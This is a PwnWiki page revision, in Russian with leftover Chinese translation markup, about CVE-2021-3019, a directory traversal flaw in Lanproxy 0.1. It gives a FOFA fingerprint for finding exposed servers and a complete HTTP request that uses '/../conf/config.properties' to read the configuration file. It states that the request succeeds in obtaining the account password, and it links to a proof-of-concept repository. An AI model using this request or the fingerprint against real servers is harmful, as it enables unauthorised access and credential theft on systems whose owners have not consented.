Difference between revisions of "CVE-2021-3019 Lanproxy 目錄遍歷漏洞/ru"

From PwnWiki
(Created page with "Отправьте следующий запрос:")
 
(Created page with "Успешно считайте пароль учетной записи в файле конфигурации.")
 
Line 23: Line 23:
 
</pre>
 
</pre>
  
<div lang="zh-Hant" dir="ltr" class="mw-content-ltr">
+
Успешно считайте пароль учетной записи в файле конфигурации.
成功在配置文件中讀取 賬號密碼。
 
</div>
 
  
  
 
==POC==
 
==POC==
 
https://github.com/FanqXu/CVE-2021-3019/
 
https://github.com/FanqXu/CVE-2021-3019/

Latest revision as of 16:06, 20 April 2021

Other languages:
Bahasa Indonesia • ‎Chinese • ‎español • ‎português • ‎русский

Воздействие уязвимости

Lanproxy 0.1

FOFA

header= "Server: LPS-0.1"

Отправьте следующий запрос:

GET /../conf/config.properties HTTP/1.1
Host: xxx.xxx.xxx.xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

Успешно считайте пароль учетной записи в файле конфигурации.